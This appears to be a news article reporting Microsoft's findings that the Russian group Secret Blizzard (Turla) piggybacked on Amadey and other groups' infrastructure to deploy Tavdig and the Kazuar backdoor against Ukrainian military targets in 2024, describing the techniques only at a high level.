In a strategic cyber espionage campaign, the Russian-affiliated group known as Secret Blizzard, also referred to as Turla, has been implicated in leveraging malware from various sources to deploy the Kazuar backdoor on targets within Ukraine. This revelation comes from Microsoft’s threat intelligence team, which observed these activities occurring primarily between March and April 2024.

Use of Amadey Bot Malware

Secret Blizzard employed the Amadey malware-as-a-service (MaaS) to infiltrate systems linked to the Ukrainian military, suggesting a targeted approach toward specific entities.

Tactics and Targets

The group is known for integrating tactics like adversary-in-the-middle (AitM) attacks, strategic web compromises, and spear-phishing for surreptitious access. Their main targets often include international ministries of foreign affairs, embassies, government offices, and defense-related organizations.

Continued Operations

Recent activity marked the second time since 2022 that Secret Blizzard has parasitized a cybercrime campaign for deploying its own tools in Ukraine.

Recent Collaborations and Infrastructure

Last week, Microsoft and Lumen Technologies’ Black Lotus Labs uncovered Turla’s commandeering of 33 command-and-control (C2) servers from a hacking group in Pakistan, identified as Storm-0156, further showcasing their adeptness at utilizing other actors’ infrastructure to mask their activities.

Amadey Commandeering

Secret Blizzard possibly accessed Amadey C2 panels or used the MaaS framework to insert a PowerShell dropper into the victim's system. This dropper carried a Base64-encoded payload pointing to Turla's C2 servers.

Reconnaissance Efforts

The attackers download reconnaissance tools to gather system information and assess defenses, focusing particularly on Microsoft Defender’s status.

Deployment and Obfuscation

Tavdig backdoor deployment involves PowerShell usage and DLL side-loading techniques, paving the way for Kazuar installation. Additionally, a PowerShell backdoor from another Russian hacker group, Flying Yeti, is potentially being repurposed to facilitate these maneuvers.

Ongoing Investigations and Expert Commentary

Microsoft is currently examining how Secret Blizzard managed to exploit the infrastructure of other groups like Storm-1837 and Amadey for their gains. This manner of leveraging third-party footholds highlights sophisticated operational techniques and challenges conventional attribution. Sherrod DeGrippo, Microsoft’s Director of Threat Intelligence Strategy, notes the rarity but effectiveness of such intricate obfuscation strategies, explaining that state-sponsored threat actors traditionally rely on their dedicated infrastructure, making this approach particularly elusive. As Secret Blizzard continues its pursuit of expanding espionage campaigns under a cloak of operational secrecy, cybersecurity entities remain vigilant in monitoring these evolving threats.

The link has been copied!